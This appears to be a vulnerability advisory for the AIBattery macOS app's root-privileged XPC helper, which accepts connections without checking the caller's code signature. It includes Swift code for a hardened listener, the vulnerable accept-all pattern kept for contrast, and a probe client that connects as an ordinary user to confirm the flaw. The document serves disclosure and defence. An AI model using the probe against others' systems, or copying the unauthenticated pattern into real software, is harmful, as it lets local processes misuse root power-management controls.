whuan132 AIBattery Missing Authentication Vulnerability in XPC Service
Vulnerability
A vulnerability exists in whuan132 AIBattery versions through 1.0.9, in the com.collweb.AIBatteryHelper component. In AIBatteryHelper/XPC/BatteryXPCService.swift, the root-privileged XPC helper registers a public Mach service and accepts every incoming connection without authenticating the connecting process; for an XPC service, that authentication is the check, in the listener delegate, of the peer's code-signing identity before its interface is exported. Because no such check is performed, any local, unprivileged process can connect to the helper and invoke its privileged power-management and system-control methods, bypassing the privilege boundary the helper exists to enforce.
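As an added example, not code from the AIBattery project, the shape of the missing check: a minimal helper whose listener delegate pins the peer to a code-signing requirement before exporting the interface, with the "accept everyone" pattern the advisory describes kept alongside for contrast. The protocol name BatteryXPCProtocol, the main-app identifier com.collweb.AIBattery and the team-ID placeholder are assumptions; the Mach service name is the one from the advisory.

```swift
import Foundation
import Security

// Assumed protocol name; the real one is in BatteryXPCService.swift.
@objc protocol BatteryXPCProtocol {
    func getVersion(withReply reply: @escaping (String) -> Void)
}

extension NSXPCConnection {
    // The peer's audit token identifies the connecting process without the PID-reuse
    // race a processIdentifier check has. `auditToken` is not public API; read via KVC.
    var peerAuditToken: audit_token_t {
        var token = audit_token_t()
        if let value = self.value(forKey: "auditToken") as? NSValue {
            value.getValue(&token)
        }
        return token
    }
}

final class BatteryXPCService: NSObject, BatteryXPCProtocol, NSXPCListenerDelegate {
    // Assumed requirement: only the team's signed main app may talk to the helper.
    // Replace identifier and team ID with the real values. A bare identifier clause
    // without the anchor/team clause is satisfied by any ad-hoc signed binary.
    private let clientRequirement =
        "anchor apple generic and identifier \"com.collweb.AIBattery\" " +
        "and certificate leaf[subject.OU] = \"TEAMID0000\""

    func getVersion(withReply reply: @escaping (String) -> Void) { reply("1.0.9") }

    // Vulnerable pattern (what the advisory describes): every peer is served.
    func acceptAnyConnection(_ newConnection: NSXPCConnection) -> Bool {
        export(on: newConnection)
        return true
    }

    // Hardened delegate: refuse the peer unless it satisfies the requirement.
    func listener(_ listener: NSXPCListener,
                  shouldAcceptNewConnection newConnection: NSXPCConnection) -> Bool {
        if #available(macOS 13.0, *) {
            // Public API: the connection is rejected if the peer fails the requirement.
            newConnection.setCodeSigningRequirement(clientRequirement)
        } else if !peerSatisfiesRequirement(newConnection) {
            return false
        }
        export(on: newConnection)
        return true
    }

    // Pre-macOS 13 path: resolve the peer's code object from its audit token and
    // evaluate the requirement against it.
    private func peerSatisfiesRequirement(_ connection: NSXPCConnection) -> Bool {
        var token = connection.peerAuditToken
        let tokenData = Data(bytes: &token, count: MemoryLayout<audit_token_t>.size)
        let attributes = [kSecGuestAttributeAudit: tokenData] as CFDictionary
        var code: SecCode?
        guard SecCodeCopyGuestWithAttributes(nil, attributes, [], &code) == errSecSuccess,
              let peerCode = code else { return false }
        var requirement: SecRequirement?
        guard SecRequirementCreateWithString(clientRequirement as CFString, [], &requirement)
                == errSecSuccess, let req = requirement else { return false }
        return SecCodeCheckValidity(peerCode, [], req) == errSecSuccess
    }

    private func export(on connection: NSXPCConnection) {
        connection.exportedInterface = NSXPCInterface(with: BatteryXPCProtocol.self)
        connection.exportedObject = self
        connection.resume()
    }
}

// Helper entry point: publish the Mach service named in the advisory.
let service = BatteryXPCService()
let listener = NSXPCListener(machServiceName: "com.collweb.AIBatteryHelper")
listener.delegate = service
listener.resume()
RunLoop.main.run()
```

The requirement string pins identity and signer, but it cannot express that the client runs with the hardened runtime and library validation; a trusted client that can be injected into (DYLD_INSERT_LIBRARIES, task ports) still launders an attacker's calls, so the main app should be signed with those protections and the helper may additionally inspect the peer's code-signing flags.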
Impact
A local, unprivileged process can perform system-level power-management operations normally reserved for root: forcing battery modes, disabling sleep, and manipulating the charging state. Abusing these can drain the battery rapidly, keep the machine awake, cause overheating, and potentially damage the battery, degrading the device's normal operation.
Reproduction
To reproduce this vulnerability, write a client that connects to the 'com.collweb.AIBatteryHelper' Mach service with an NSXPCConnection created using the privileged option (the helper is a launchd daemon, not a per-user agent), sets the remote object interface to the helper's protocol, and calls an exposed method such as 'getVersion'. A reply returned to a non-root, unrelated process demonstrates that the helper served the caller without authenticating it. The connection and method invocation can be scripted so the check runs unattended as an ordinary user.
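The probe described above, as an added example that is not part of the original advisory: a standalone Swift client that connects to the helper's Mach service from a non-root shell and asks for the version. The protocol name and the reply-block selector on getVersion are assumptions; they must match the helper's actual protocol for the call to be delivered.

```swift
import Foundation

// Assumed protocol and selector; the real ones are in the helper's source.
@objc protocol BatteryXPCProtocol {
    func getVersion(withReply reply: @escaping (String) -> Void)
}

/// Connects to the helper's Mach service as an ordinary user process and asks for
/// its version. Returns the reply, or nil if the helper refused or did not answer.
func probeHelper(machService: String = "com.collweb.AIBatteryHelper",
                 timeout: TimeInterval = 5) -> String? {
    // .privileged: the peer is a launchd daemon (root), not a per-user agent.
    let connection = NSXPCConnection(machServiceName: machService, options: .privileged)
    connection.remoteObjectInterface = NSXPCInterface(with: BatteryXPCProtocol.self)
    connection.resume()
    defer { connection.invalidate() }

    let done = DispatchSemaphore(value: 0)
    var result: String?
    let proxy = connection.remoteObjectProxyWithErrorHandler { error in
        // A helper that enforces a code-signing requirement or rejects the
        // connection in its listener delegate lands here instead of replying.
        fputs("XPC error: \(error)\n", stderr)
        done.signal()
    } as? BatteryXPCProtocol

    proxy?.getVersion { version in
        result = version
        done.signal()
    }
    // Times out if the selector does not match or the helper never answers.
    _ = done.wait(timeout: .now() + timeout)
    return result
}

// Run from a non-root shell: a version string back means the helper served an
// unauthenticated caller; an error or timeout means it did not.
if let version = probeHelper() {
    print("helper answered getVersion: \(version) (no client authentication)")
} else {
    print("helper refused or did not answer")
}
```

Build with `swiftc probe.swift -o probe` and run it as a regular user; do not code-sign it with the vendor's team identity, since the point of the check is that an unrelated binary gets served.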
